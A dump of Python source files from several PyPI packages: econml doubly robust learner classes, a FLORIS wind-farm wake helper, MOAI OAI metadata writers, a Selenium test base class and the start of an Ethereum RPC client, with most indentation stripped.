CATE L1 regularization applied through the debiased lasso in the final model.
'auto' corresponds to a CV form of the :class:`DebiasedLasso`.
n_alphas : int, optional, default 100
How many alphas to try if alpha='auto'
alpha_cov : string | float, optional, default 'auto'
The regularization alpha that is used when constructing the pseudo inverse of
        the covariance matrix Theta used for correcting the final stage lasso coefficient
in the debiased lasso. Each such regression corresponds to the regression of one feature
on the remainder of the features.
n_alphas_cov : int, optional, default 10
How many alpha_cov to try if alpha_cov='auto'.
max_iter : int, optional, default 1000
The maximum number of iterations in the Debiased Lasso
tol : float, optional, default 1e-4
The tolerance for the optimization: if the updates are
smaller than ``tol``, the optimization code checks the
dual gap for optimality and continues until it is smaller
than ``tol``.
n_jobs : int or None, optional (default=None)
The number of jobs to run in parallel for both `fit` and `predict`.
``None`` means 1 unless in a :func:`joblib.parallel_backend` context.
``-1`` means using all processors.
min_propensity : float, optional, default ``1e-6``
The minimum propensity at which to clip propensity estimates to avoid dividing by zero.
categories: 'auto' or list, default 'auto'
The categories to use when encoding discrete treatments (or 'auto' to use the unique sorted values).
The first category will be treated as the control treatment.
cv: int, cross-validation generator or an iterable, optional, default 2
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- :term:`CV splitter`
- An iterable yielding (train, test) splits as arrays of indices.
For integer/None inputs, if the treatment is discrete
:class:`~sklearn.model_selection.StratifiedKFold` is used, else,
:class:`~sklearn.model_selection.KFold` is used
(with a random shuffle in either case).
Unless an iterable is used, we call `split(X,T)` to generate the splits.
mc_iters: int, optional (default=None)
The number of times to rerun the first stage models to reduce the variance of the nuisances.
mc_agg: {'mean', 'median'}, optional (default='mean')
How to aggregate the nuisance value for each sample across the `mc_iters` monte carlo iterations of
cross-fitting.
random_state: int, :class:`~numpy.random.mtrand.RandomState` instance or None
If int, random_state is the seed used by the random number generator;
If :class:`~numpy.random.mtrand.RandomState` instance, random_state is the random number generator;
If None, the random number generator is the :class:`~numpy.random.mtrand.RandomState` instance used
by :mod:`np.random<numpy.random>`.
Examples
--------
A simple example with the default models:
.. testcode::
:hide:
import numpy as np
import scipy.special
np.set_printoptions(suppress=True)
.. testcode::
from econml.dr import DRLearner, SparseLinearDRLearner
np.random.seed(123)
X = np.random.normal(size=(1000, 3))
T = np.random.binomial(2, scipy.special.expit(X[:, 0]))
y = (1 + .5*X[:, 0]) * T + X[:, 0] + np.random.normal(size=(1000,))
est = SparseLinearDRLearner()
est.fit(y, T, X=X, W=None)
>>> est.effect(X[:3])
array([ 0.41..., 0.31..., -0.12...])
>>> est.effect_interval(X[:3])
(array([-0.02..., -0.29... , -0.84...]), array([0.84..., 0.92..., 0.59...]))
>>> est.coef_(T=1)
array([ 0.45..., -0.00..., 0.06...])
>>> est.coef__interval(T=1)
(array([ 0.20..., -0.23..., -0.17...]), array([0.69..., 0.23..., 0.30...]))
>>> est.intercept_(T=1)
0.88...
>>> est.intercept__interval(T=1)
(0.64..., 1.11...)
Attributes
----------
score_ : float
The MSE in the final doubly robust potential outcome regressions, i.e.
.. math::
\\frac{1}{n_t} \\sum_{t=1}^{n_t} \\frac{1}{n} \\sum_{i=1}^n (Y_{i, t}^{DR} - \\hat{\\theta}_t(X_i))^2
where n_t is the number of treatments (excluding control).
If `sample_weight` is not None at fit time, then a weighted average across samples is returned.
"""
def __init__(self, *,
model_propensity='auto',
model_regression='auto',
featurizer=None,
fit_cate_intercept=True,
alpha='auto',
n_alphas=100,
alpha_cov='auto',
n_alphas_cov=10,
max_iter=1000,
tol=1e-4,
n_jobs=None,
min_propensity=1e-6,
categories='auto',
cv=2,
mc_iters=None,
mc_agg='mean',
random_state=None):
self.fit_cate_intercept = fit_cate_intercept
self.alpha = alpha
self.n_alphas = n_alphas
self.alpha_cov = alpha_cov
self.n_alphas_cov = n_alphas_cov
self.max_iter = max_iter
self.tol = tol
self.n_jobs = n_jobs
super().__init__(model_propensity=model_propensity,
model_regression=model_regression,
model_final=None,
featurizer=featurizer,
multitask_model_final=False,
min_propensity=min_propensity,
categories=categories,
cv=cv,
mc_iters=mc_iters,
mc_agg=mc_agg,
random_state=random_state)
def _gen_model_final(self):
return DebiasedLasso(alpha=self.alpha,
n_alphas=self.n_alphas,
alpha_cov=self.alpha_cov,
n_alphas_cov=self.n_alphas_cov,
fit_intercept=self.fit_cate_intercept,
max_iter=self.max_iter,
tol=self.tol,
n_jobs=self.n_jobs,
random_state=self.random_state)
def _gen_ortho_learner_model_final(self):
return _ModelFinal(self._gen_model_final(), self._gen_featurizer(), False)
def fit(self, Y, T, *, X=None, W=None, sample_weight=None, groups=None,
cache_values=False, inference='auto'):
"""
Estimate the counterfactual model from data, i.e. estimates function :math:`\\theta(\\cdot)`.
Parameters
----------
Y: (n,) vector of length n
Outcomes for each sample
T: (n,) vector of length n
Treatments for each sample
X: optional(n, d_x) matrix or None (Default=None)
Features for each sample
W: optional(n, d_w) matrix or None (Default=None)
Controls for each sample
sample_weight : (n,) array like or None
Individual weights for each sample. If None, it assumes equal weight.
groups: (n,) vector, optional
All rows corresponding to the same group will be kept together during splitting.
If groups is not None, the `cv` argument passed to this class's initializer
must support a 'groups' argument to its split method.
cache_values: bool, default False
Whether to cache inputs and first stage results, which will allow refitting a different final model
inference: string, :class:`.Inference` instance, or None
Method for performing inference. This estimator supports ``'bootstrap'``
(or an instance of :class:`.BootstrapInference`) and ``'debiasedlasso'``
(or an instance of :class:`.LinearModelInferenceDiscrete`).
Returns
-------
self: DRLearner instance
"""
# TODO: support freq_weight and sample_var in debiased lasso
# Replacing fit from DRLearner, to add debiasedlasso inference in docstring
check_high_dimensional(X, T, threshold=5, featurizer=self.featurizer,
discrete_treatment=self.discrete_treatment,
msg="The number of features in the final model (< 5) is too small for a sparse model. "
"We recommend using the LinearDRLearner for this low-dimensional setting.")
return super().fit(Y, T, X=X, W=W,
sample_weight=sample_weight, groups=groups,
cache_values=cache_values, inference=inference)
@property
def fit_cate_intercept_(self):
return self.model_final_.fit_intercept
@property
def multitask_model_final(self):
return False
@multitask_model_final.setter
def multitask_model_final(self, value):
if value:
raise ValueError("Parameter `multitask_model_final` cannot change from `False` for this estimator!")
@property
def model_final(self):
return self._gen_model_final()
@model_final.setter
def model_final(self, model):
if model is not None:
raise ValueError("Parameter `model_final` cannot be altered for this estimator!")
class ForestDRLearner(ForestModelFinalCateEstimatorDiscreteMixin, DRLearner):
""" Instance of DRLearner with a :class:`~econml.grf.RegressionForest`
as a final model, so as to enable non-parametric inference.
Parameters
----------
    model_propensity : scikit-learn classifier or 'auto', optional (default='auto')
        Estimator for Pr[T=t | X, W]. Trained by regressing treatments on (features, controls) concatenated.
        Must implement `fit` and `predict_proba` methods. The `fit` method must be able to accept X and T,
        where T is a shape (n, ) array.
        If 'auto', :class:`~sklearn.linear_model.LogisticRegressionCV` will be chosen.
    model_regression : scikit-learn regressor or 'auto', optional (default='auto')
        Estimator for E[Y | X, W, T]. Trained by regressing Y on (features, controls, one-hot-encoded treatments)
        concatenated. The one-hot-encoding excludes the baseline treatment. Must implement `fit` and
        `predict` methods. If different models per treatment arm are desired, see the
        :class:`~econml.utilities.MultiModelWrapper` helper class.
        If 'auto', :class:`.WeightedLassoCV`/:class:`.WeightedMultiTaskLassoCV` will be chosen.
    featurizer : :term:`transformer`, optional, default None
        Must support fit_transform and transform. Used to create composite features in the final CATE regression.
        It is ignored if X is None. The final CATE will be trained on the outcome of featurizer.fit_transform(X).
        If featurizer=None, then CATE is trained on X.
min_propensity : float, optional, default ``1e-6``
The minimum propensity at which to clip propensity estimates to avoid dividing by zero.
categories: 'auto' or list, default 'auto'
The categories to use when encoding discrete treatments (or 'auto' to use the unique sorted values).
The first category will be treated as the control treatment.
cv: int, cross-validation generator or an iterable, optional (Default=2)
Determines the cross-validation splitting strategy.
Possible inputs for cv are:
- None, to use the default 3-fold cross-validation,
- integer, to specify the number of folds.
- :term:`CV splitter`
- An iterable yielding (train, test) splits as arrays of indices.
For integer/None inputs, if the treatment is discrete
:class:`~sklearn.model_selection.StratifiedKFold` is used, else,
:class:`~sklearn.model_selection.KFold` is used
(with a random shuffle in either case).
Unless an iterable is used, we call `split(concat[W, X], T)` to generate the splits. If all
W, X are None, then we call `split(ones((T.shape[0], 1)), T)`.
mc_iters: int, optional (default=None)
The number of times to rerun the first stage models to reduce the variance of the nuisances.
mc_agg: {'mean', 'median'}, optional (default='mean')
How to aggregate the nuisance value for each sample across the `mc_iters` monte carlo iterations of
cross-fitting.
    n_estimators : integer, optional (default=1000)
        The total number of trees in the forest. The forest consists of
        sqrt(n_estimators) sub-forests, where each sub-forest
        contains sqrt(n_estimators) trees.
max_depth : integer or None, optional (default=None)
The maximum depth of the tree. If None, then nodes are expanded until
all leaves are pure or until all leaves contain less than
min_samples_split samples.
    min_samples_split : int, float, optional (default=5)
The minimum number of splitting samples required to split an internal node.
- If int, then consider `min_samples_split` as the minimum number.
- If float, then `min_samples_split` is a fraction and
`ceil(min_samples_split * n_samples)` are the minimum
number of samples for each split.
    min_samples_leaf : int, float, optional (default=5)
The minimum number of samples required to be at a leaf node.
A split point at any depth will only be considered if it leaves at
least ``min_samples_leaf`` splitting samples in each of the left and
right branches. This may have the effect of smoothing the model,
especially in regression. After construction the tree is also pruned
so that there are at least min_samples_leaf estimation samples on
each leaf.
- If int, then consider `min_samples_leaf` as the minimum number.
- If float, then `min_samples_leaf` is a fraction and
`ceil(min_samples_leaf * n_samples)` are the minimum
number of samples for each node.
min_weight_fraction_leaf : float, optional (default=0.)
The minimum weighted fraction of the sum total of weights (of all
splitting samples) required to be at a leaf node. Samples have
equal weight when sample_weight is not provided. After construction
the tree is pruned so that the fraction of the sum total weight
of the estimation samples contained in each leaf node is at
least min_weight_fraction_leaf
max_features : int, float, string or None, optional (default="auto")
The number of features to consider when looking for the best split:
- If int, then consider `max_features` features at each split.
- If float, then `max_features` is a fraction and
`int(max_features * n_features)` features are considered at each
split.
- If "auto", then `max_features=n_features`.
- If "sqrt", then `max_features=sqrt(n_features)`.
- If "log2", then `max_features=log2(n_features)`.
- If None, then `max_features=n_features`.
Note: the search for a split does not stop until at least one
valid partition of the node samples is found, even if it requires to
effectively inspect more than ``max_features`` features.
min_impurity_decrease : float, optional (default=0.)
A node will be split if this split induces a decrease of the impurity
greater than or equal to this value.
The weighted impurity decrease equation is the following::
N_t / N * (impurity - N_t_R / N_t * right_impurity
- N_t_L / N_t * left_impurity)
where ``N`` is the total number of split samples, ``N_t`` is the number of
split samples at the current node, ``N_t_L`` is the number of split samples in the
left child, and ``N_t_R`` is the number of split samples in the right child.
``N``, ``N_t``, ``N_t_R`` and ``N_t_L`` all refer to the weighted sum,
if ``sample_weight`` is passed.
max_samples : int or float in (0, .5], default=.45,
The number of samples to use for each subsample that is used to train each tree:
- If int, then train each tree on `max_samples` samples, sampled without replacement from all the samples
- If float, then train each tree on ceil(`max_samples` * `n_samples`), sampled without replacement
from all the samples.
min_balancedness_tol: float in [0, .5], default=.45
How imbalanced a split we can tolerate. This enforces that each split leaves at least
(.5 - min_balancedness_tol) fraction of samples on each side of the split; or fraction
        of the total weight of samples, when sample_weight is not None. The default value ensures
        that at least 5% of the parent node weight falls in each side of the split. Set it to 0.0 for no
balancedness and to .5 for perfectly balanced splits. For the formal inference theory
to be valid, this has to be any positive constant bounded away from zero.
honest : boolean, optional (default=True)
Whether to use honest trees, i.e. half of the samples are used for
creating the tree structure and the other half for the estimation at
the leafs. If False, then all samples are used for both parts.
subforest_size : int, default=4,
The number of trees in each sub-forest that is used in the bootstrap-of-little-bags calculation.
The parameter `n_estimators` must be divisible by `subforest_size`. Should typically be a small constant.
n_jobs : int or None, optional (default=-1)
The number of jobs to run in parallel for both `fit` and `predict`.
``None`` means 1 unless in a :func:`joblib.parallel_backend` context.
``-1`` means using all processors. See :term:`Glossary <n_jobs>`
for more details.
verbose : int, optional (default=0)
Controls the verbosity when fitting and predicting.
random_state: int, :class:`~numpy.random.mtrand.RandomState` instance or None, optional (default=None)
If int, random_state is the seed used by the random number generator;
If :class:`~numpy.random.mtrand.RandomState` instance, random_state is the random number generator;
If None, the random number generator is the :class:`~numpy.random.mtrand.RandomState` instance used
by :mod:`np.random<numpy.random>`.
"""
def __init__(self, *,
model_regression="auto",
model_propensity="auto",
featurizer=None,
min_propensity=1e-6,
categories='auto',
cv=2,
mc_iters=None,
mc_agg='mean',
n_estimators=1000,
max_depth=None,
min_samples_split=5,
min_samples_leaf=5,
min_weight_fraction_leaf=0.,
max_features="auto",
min_impurity_decrease=0.,
max_samples=.45,
min_balancedness_tol=.45,
honest=True,
subforest_size=4,
n_jobs=-1,
verbose=0,
random_state=None):
self.n_estimators = n_estimators
self.max_depth = max_depth
self.min_samples_split = min_samples_split
self.min_samples_leaf = min_samples_leaf
self.min_weight_fraction_leaf = min_weight_fraction_leaf
self.max_features = max_features
self.min_impurity_decrease = min_impurity_decrease
self.max_samples = max_samples
self.min_balancedness_tol = min_balancedness_tol
self.honest = honest
self.subforest_size = subforest_size
self.n_jobs = n_jobs
self.verbose = verbose
super().__init__(model_regression=model_regression,
model_propensity=model_propensity,
model_final=None,
featurizer=featurizer,
multitask_model_final=False,
min_propensity=min_propensity,
categories=categories,
cv=cv,
mc_iters=mc_iters,
mc_agg=mc_agg,
random_state=random_state)
def _gen_model_final(self):
return RegressionForest(n_estimators=self.n_estimators,
max_depth=self.max_depth,
min_samples_split=self.min_samples_split,
min_samples_leaf=self.min_samples_leaf,
min_weight_fraction_leaf=self.min_weight_fraction_leaf,
max_features=self.max_features,
min_impurity_decrease=self.min_impurity_decrease,
max_samples=self.max_samples,
min_balancedness_tol=self.min_balancedness_tol,
honest=self.honest,
inference=True,
subforest_size=self.subforest_size,
n_jobs=self.n_jobs,
random_state=self.random_state,
verbose=self.verbose,
warm_start=False)
def _gen_ortho_learner_model_final(self):
return _ModelFinal(self._gen_model_final(), self._gen_featurizer(), False)
def fit(self, Y, T, *, X=None, W=None, sample_weight=None, groups=None,
cache_values=False, inference='auto'):
"""
        Estimate the counterfactual model from data, i.e. estimates function :math:`\\theta(\\cdot)`.
        Parameters
        ----------
        Y: (n, d_y) matrix or vector of length n
            Outcomes for each sample
        T: (n, d_t) matrix or vector of length n
            Treatments for each sample
        X: optional (n, d_x) matrix or None (Default=None)
            Features for each sample
        W: optional (n, d_w) matrix or None (Default=None)
            Controls for each sample
sample_weight : (n,) array like or None
Individual weights for each sample. If None, it assumes equal weight.
groups: (n,) vector, optional
All rows corresponding to the same group will be kept together during splitting.
If groups is not None, the `cv` argument passed to this class's initializer
must support a 'groups' argument to its split method.
cache_values: bool, default False
Whether to cache inputs and first stage results, which will allow refitting a different final model
inference: string, `Inference` instance, or None
Method for performing inference. This estimator supports 'bootstrap'
(or an instance of :class:`.BootstrapInference`) and 'blb'
(for Bootstrap-of-Little-Bags based inference)
Returns
-------
self
"""
if X is None:
raise ValueError("This estimator does not support X=None!")
return super().fit(Y, T, X=X, W=W,
sample_weight=sample_weight, groups=groups,
cache_values=cache_values, inference=inference)
    @property
    def multitask_model_cate(self):
        # Replacing this property, which is invalid for this class, to keep its
        # docstring out of the docs.
        return super().multitask_model_cate
@property
def multitask_model_final(self):
return False
@multitask_model_final.setter
def multitask_model_final(self, value):
if value:
raise ValueError("Parameter `multitask_model_final` cannot change from `False` for this estimator!")
@property
def model_final(self):
return self._gen_model_final()
@model_final.setter
def model_final(self, model):
if model is not None:
raise ValueError("Parameter `model_final` cannot be altered for this estimator!") | PypiClean |
/FLORIS-3.4.1.tar.gz/FLORIS-3.4.1/floris/tools/optimization/legacy/scipy/derive_downstream_turbines.py |
# Licensed under the Apache License, Version 2.0 (the "License"); you may not
# use this file except in compliance with the License. You may obtain a copy of
# the License at http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations under
# the License.
# See https://floris.readthedocs.io for documentation
import matplotlib.pyplot as plt
import numpy as np
def derive_downstream_turbines(fi, wind_direction, wake_slope=0.30, plot_lines=False):
"""Determine which turbines have no effect on other turbines in the
farm, i.e., which turbines have wakes that do not impact the other
turbines in the farm. This allows the user to exclude these turbines
from a control setpoint optimization, for example. This function
assumes a very simplified wake function where the wakes are assumed
to have a linearly diverging profile. In comparisons with the FLORIS
GCH model, the wake_slope matches well with the FLORIS' wake profiles
for a value of wake_slope = 0.5 * turbulence_intensity, where
turbulence_intensity is an input to the FLORIS model at the default
    GCH parameterization. Note that this function does not include wind direction variability.
To be conservative, the user is recommended to use the rule of thumb:
`wake_slope = turbulence_intensity`. Hence, the default value for
`wake_slope=0.30` should be conservative for turbulence intensities up to
0.30 and is likely to provide valid estimates of which turbines are
downstream until a turbulence intensity of 0.50. This simple model saves
time compared to FLORIS.
Args:
fi ([floris object]): FLORIS object of the farm of interest.
wind_direction (float): The wind direction in the FLORIS frame
of reference for which the downstream turbines are to be determined.
wake_slope (float, optional): linear slope of the wake (dy/dx)
plot_lines (bool, optional): Enable plotting wakes/turbines.
Defaults to False.
Returns:
turbs_downstream (iterable): A list containing the turbine
numbers that have a wake that does not affect any other
turbine inside the farm.
"""
# Get farm layout
x = fi.layout_x
y = fi.layout_y
D = np.array([t.rotor_diameter for t in fi.floris.farm.turbines])
n_turbs = len(x)
# Rotate farm and determine freestream/waked turbines
is_downstream = [False for _ in range(n_turbs)]
x_rot = (
np.cos((wind_direction - 270.0) * np.pi / 180.0) * x
- np.sin((wind_direction - 270.0) * np.pi / 180.0) * y
)
y_rot = (
np.sin((wind_direction - 270.0) * np.pi / 180.0) * x
+ np.cos((wind_direction - 270.0) * np.pi / 180.0) * y
)
if plot_lines:
fig, ax = plt.subplots()
for ii in range(n_turbs):
ax.plot(
x_rot[ii] * np.ones(2),
[y_rot[ii] - D[ii] / 2, y_rot[ii] + D[ii] / 2],
"k",
)
for ii in range(n_turbs):
ax.text(x_rot[ii], y_rot[ii], "T%03d" % ii)
ax.axis("equal")
    srt = np.argsort(x_rot)
    x_rot_srt = x_rot[srt]
    y_rot_srt = y_rot[srt]
    D_srt = D[srt]  # keep rotor diameters aligned with the sorted coordinates
for ii in range(n_turbs):
x0 = x_rot_srt[ii]
y0 = y_rot_srt[ii]
def wake_profile_ub_turbii(x):
            y = (y0 + D_srt[ii]) + (x - x0) * wake_slope
if isinstance(y, (float, np.float64, np.float32)):
if x < (x0 + 0.01):
y = -np.Inf
else:
y[x < x0 + 0.01] = -np.Inf
return y
def wake_profile_lb_turbii(x):
            y = (y0 - D_srt[ii]) - (x - x0) * wake_slope
if isinstance(y, (float, np.float64, np.float32)):
if x < (x0 + 0.01):
y = -np.Inf
else:
y[x < x0 + 0.01] = -np.Inf
return y
def determine_if_in_wake(xt, yt):
return (yt < wake_profile_ub_turbii(xt)) & (yt > wake_profile_lb_turbii(xt))
is_downstream[ii] = not any(
determine_if_in_wake(x_rot_srt[iii], y_rot_srt[iii]) for iii in range(n_turbs)
)
if plot_lines:
x1 = np.max(x_rot_srt) + 500.0
ax.fill_between(
[x0, x1, x1, x0],
[
wake_profile_ub_turbii(x0 + 0.02),
wake_profile_ub_turbii(x1),
wake_profile_lb_turbii(x1),
wake_profile_lb_turbii(x0 + 0.02),
],
alpha=0.1,
color="k",
edgecolor=None,
)
usrt = np.argsort(srt)
is_downstream = [is_downstream[i] for i in usrt]
turbs_downstream = list(np.where(is_downstream)[0])
if plot_lines:
ax.set_title("wind_direction = %03d" % wind_direction)
ax.set_xlim([np.min(x_rot) - 500.0, x1])
ax.set_ylim([np.min(y_rot) - 500.0, np.max(y_rot) + 500.0])
ax.plot(
x_rot[turbs_downstream], y_rot[turbs_downstream], "o", color="green",
)
return turbs_downstream | PypiClean |
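# Editor's sketch: `fi` is assumed to be a FLORIS interface object built
# elsewhere; only the function above is exercised. Per the docstring, wake_slope
# should sit near the ambient turbulence intensity `ti` to stay conservative.
def _example_derive_downstream(fi, ti=0.06):
    turbines = derive_downstream_turbines(
        fi, wind_direction=270.0, wake_slope=max(0.30, ti), plot_lines=False
    )
    print("Turbines whose wakes reach no other turbine:", turbines)
    return turbines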
/MOAI-2.0.0.tar.gz/MOAI-2.0.0/moai/metadata.py | from lxml.builder import ElementMaker
XSI_NS = 'http://www.w3.org/2001/XMLSchema-instance'
class OAIDC(object):
"""The standard OAI Dublin Core metadata format.
Every OAI feed should at least provide this format.
It is registered under the name 'oai_dc'
"""
def __init__(self, prefix, config, db):
self.prefix = prefix
self.config = config
self.db = db
self.ns = {'oai_dc': 'http://www.openarchives.org/OAI/2.0/oai_dc/',
'dc':'http://purl.org/dc/elements/1.1/'}
self.schemas = {'oai_dc': 'http://www.openarchives.org/OAI/2.0/oai_dc.xsd'}
def get_namespace(self):
return self.ns[self.prefix]
def get_schema_location(self):
return self.schemas[self.prefix]
def __call__(self, element, metadata):
data = metadata.record
OAI_DC = ElementMaker(namespace=self.ns['oai_dc'],
nsmap =self.ns)
DC = ElementMaker(namespace=self.ns['dc'])
oai_dc = OAI_DC.dc()
oai_dc.attrib['{%s}schemaLocation' % XSI_NS] = '%s %s' % (
self.ns['oai_dc'],
self.schemas['oai_dc'])
for field in ['title', 'creator', 'subject', 'description',
'publisher', 'contributor', 'type', 'format',
'identifier', 'source', 'language', 'date',
'relation', 'coverage', 'rights']:
el = getattr(DC, field)
for value in data['metadata'].get(field, []):
if field == 'identifier' and data['metadata'].get('url'):
value = data['metadata']['url'][0]
oai_dc.append(el(value))
element.append(oai_dc)
class MODS(object):
"""This is the minimods formats as defined by DARE.
It is registered as prefix 'mods'.'
"""
def __init__(self, prefix, config, db):
self.prefix = prefix
self.config = config
self.db = db
self.ns = {'mods': 'http://www.loc.gov/mods/v3',
'xml':'http://www.w3.org/XML/1998/namespace',
'dai': 'info:eu-repo/dai'}
self.schemas = {
'mods': 'http://www.loc.gov/standards/mods/v3/mods-3-2.xsd'}
def get_namespace(self):
return self.ns[self.prefix]
def get_schema_location(self):
return self.schemas[self.prefix]
def __call__(self, element, metadata):
data = metadata.record
MODS = ElementMaker(namespace=self.ns['mods'], nsmap=self.ns)
DAI = ElementMaker(namespace=self.ns['dai'], nsmap=self.ns)
mods = MODS.mods(version="3.2")
if data['metadata'].get('identifier'):
mods.append(MODS.identifier(data['metadata']['identifier'][0],
type="uri"))
if data['metadata'].get('url'):
mods.append(MODS.location(MODS.url(data['metadata']['url'][0])))
if data['metadata'].get('title'):
titleInfo = MODS.titleInfo(
MODS.title(data['metadata']['title'][0])
)
titleInfo.attrib['{%s}lang' % self.ns['xml']] = data['metadata'].get(
'language', ['en'])[0]
mods.append(titleInfo)
if data['metadata'].get('description'):
mods.append(MODS.abstract(data['metadata']['description'][0]))
for ctype in ['author', 'editor', 'advisor']:
contributor_data = []
for id in data['metadata'].get('%s_rel' % ctype, []):
contributor = self.db.get_metadata(id)
contributor['id'] = id
contributor_data.append(contributor)
if data['metadata'].get('%s_data' % ctype):
contributor_data = [s for s in data['metadata'][
'%s_data' % ctype]]
if not contributor_data:
contributor_data = [{'name':[a]} for a in data[
'metadata'].get(ctype, [])]
dai_list = []
for contributor in contributor_data:
unique_id = data['record']['id'] + '_' + contributor.get(
'id', contributor['name'][0])
if unique_id[0].isdigit():
unique_id = '_'+unique_id
unique_id = unique_id.replace(':', '')
name = MODS.name(
MODS.displayForm(contributor['name'][0]),
type='personal',
ID=unique_id
)
surname = contributor.get('surname')
if surname:
name.append(MODS.namePart(surname[0], type="family"))
firstname = contributor.get('firstname')
if firstname:
name.append(MODS.namePart(firstname[0], type="given"))
role = contributor.get('role')
if role:
role = role[0]
else:
roles = {'author': 'aut', 'editor': 'edt', 'advisor':'ths'}
role = roles[ctype]
name.append(
MODS.role(
MODS.roleTerm(role,
type='code',
authority='marcrelator')
))
mods.append(name)
dai = contributor.get('dai')
if dai:
dai_list.append((unique_id, dai))
if dai_list:
daiList = DAI.daiList()
for id, dai in dai_list:
daiList.append(DAI.identifier(
dai[0],
IDref=id,
authority='info:eu-repo/dai/nl'))
mods.append(MODS.extension(daiList))
dgg = data['metadata'].get('degree_grantor')
if dgg:
mods.append(MODS.name(
MODS.namePart(dgg[0]),
MODS.role(
MODS.roleTerm('dgg',
authority="marcrelator",
type="code")
),
type="corporate"))
if data['metadata'].get('language'):
mods.append(MODS.language(
MODS.languageTerm(data['metadata']['language'][0],
type="code",
authority="rfc3066")))
for host in ['journal', 'series']:
title = data['metadata'].get('%s_title' % host)
part_type = {'journal': 'host'}.get(host, host)
relitem = MODS.relatedItem(type=part_type)
if title:
relitem.append(MODS.titleInfo(MODS.title(title[0])))
else:
continue
issn = data['metadata'].get('%s_issn' % host)
if issn:
relitem.append(
MODS.identifier('urn:issn:%s' % issn[0],
type="uri"))
volume = data['metadata'].get('%s_volume' % host)
issue = data['metadata'].get('%s_issue' % host)
start_page = data['metadata'].get('%s_start_page' % host)
end_page = data['metadata'].get('%s_end_page' % host)
if volume or issue or end_page or start_page:
part = MODS.part()
if volume:
part.append(MODS.detail(MODS.number(volume[0]),
type="volume"))
if issue:
part.append(MODS.detail(MODS.number(issue[0]),
type="issue"))
if start_page or end_page:
extent = MODS.extent(unit="page")
if start_page:
extent.append(MODS.start(start_page[0]))
if end_page:
extent.append(MODS.end(end_page[0]))
part.append(extent)
relitem.append(part)
if data['metadata'].get('%s_publisher' % host):
relitem.append(
MODS.originInfo(
MODS.publisher(
data['metadata']['%s_publisher' % host][0])))
mods.append(relitem)
origin = MODS.originInfo()
mods.append(origin)
if data['metadata'].get('publisher'):
origin.append(MODS.publisher(data['metadata']['publisher'][0]))
if data['metadata'].get('date'):
origin.append(MODS.dateIssued(data['metadata']['date'][0],
encoding='iso8601'))
mods.append(MODS.typeOfResource('text'))
if data['metadata'].get('dare_type'):
mods.append(MODS.genre(data['metadata']['dare_type'][0]))
classifications = data['metadata'].get('classification', [])
for classification in classifications:
if classification.count('#') == 1:
authority, value = classification.split('#')
mods.append(MODS.classification(value, authority=authority))
else:
mods.append(MODS.classification(classification))
subjects = data['metadata'].get('subject', [])
if subjects:
s_el = MODS.subject()
for subject in subjects:
s_el.append(MODS.topic(subject))
mods.append(s_el)
if data['metadata'].get('rights'):
mods.append(MODS.accessCondition(data['metadata']['rights'][0]))
mods.attrib['{%s}schemaLocation' % XSI_NS] = '%s %s' % (
self.ns['mods'],
self.schemas['mods'])
element.append(mods) | PypiClean |
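# Editor's sketch, assuming the surrounding MOAI plumbing: `db` must provide
# get_metadata (used by the MODS writer for contributor lookups) and `metadata`
# must expose a `record` dict as read by __call__ above. Both writers append
# their XML onto a caller-supplied lxml element.
def _example_render_oai_dc(db, metadata):
    from lxml import etree
    writer = OAIDC('oai_dc', config=None, db=db)
    root = etree.Element('metadata')
    writer(root, metadata)
    return etree.tostring(root, pretty_print=True)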
/HC_UIAutomation-0.0.1.tar.gz/HC_UIAutomation-0.0.1/page_action/base.py | import time
from selenium import webdriver
from util.log_util import logger
from selenium.webdriver.support.wait import WebDriverWait
from selenium.webdriver.support import expected_conditions
from selenium.webdriver.common.by import By
class Base:
_BASE_URL = ""
def __init__(self, base_driver=None,host=None):
"""初始化driver 如果存在,复用driver ,如果不存在 创建一个driver"""
if base_driver:
            # reuse the existing driver
            logger.info("Reusing driver")
self.driver = base_driver
else:
            # base_driver is None
            # create a new driver
            # step 1: create a driver instance variable
            logger.info("Creating driver")
self.driver = webdriver.Chrome()
self.driver.maximize_window()
self.driver.implicitly_wait(5)
if not self.driver.current_url.startswith("http"):
            # if the current URL does not start with http, open _BASE_URL
self._BASE_URL = host + "/portal/admin/#/login"
self.driver.get(self._BASE_URL)
def do_find(self, by, value=None):
logger.info(f"查找元素{by, value}")
"""查找单个元素"""
if value:
return self.driver.find_element(by, value)
else:
# (By.ID,"")
return self.driver.find_element(*by)
def do_finds(self, by, value=None):
"""查找多个元素"""
# (By.ID,"")
if value:
return self.driver.find_elements(by, value)
else:
return self.driver.find_elements(*by)
def do_send_keys(self, text, by, value=None):
logger.info(f"输入内容{text}")
"""输入文本"""
ele = self.do_find(by, value)
ele.clear()
ele.send_keys(text)
def explicit_wait(self,seconds,by):
logger.info(f"等待秒数{seconds},等待可点击元素{by}")
"""目前只写了显示等待元素可点击"""
WebDriverWait(self.driver,seconds).until(expected_conditions.element_to_be_clickable(by))
def operation_table(self,table_location):
"""
表格操作,以二维数组形式返回表格中所有的值
:param table_location: 定位表格的方法
:return:以二维数组形式返回表格中所有内容
"""
logger.info(f"表格定位地址为{table_location}")
_TABLE = (table_location)
tb_list = self.driver.find_element(*_TABLE).find_elements(By.TAG_NAME, "tr")
arr_list = []
for tr in tb_list:
arr = tr.text.split("\n")
arr_list.append(arr)
logger.info(f"表格内容为:{arr_list}")
return arr_list
def operation_ul_li(self,ul_location,li_value):
lis = self.do_finds(By.XPATH,ul_location)
for li in lis:
if li_value in li.text:
li.click()
break
def close_driver(self):
time.sleep(3)
self.driver.quit() | PypiClean |
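# Editor's sketch of a login flow against a hypothetical host; the element
# locators below are assumptions, not part of this library, and the admin login
# path itself is hard-coded in __init__ above.
def _example_login(host):
    page = Base(base_driver=None, host=host)
    page.do_send_keys("admin", (By.ID, "username")) # assumed field id
    page.do_send_keys("secret", (By.ID, "password")) # assumed field id
    page.do_find((By.XPATH, "//button[@type='submit']")).click() # assumed locator
    page.close_driver()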
/EtherPy-0.0.501.tar.gz/EtherPy-0.0.501/src/etherpy/Client.py | import requests
import json
from .Helper import Helper
class Client:
requestCount = 0
def __init__(self, host, port):
"""
Instantiate a new Ethereum Node client with the supplied host and port.
:param host: Host/IPAddress to connect to
:param port: Port to connect to JSON-RPC
"""
self.host = host
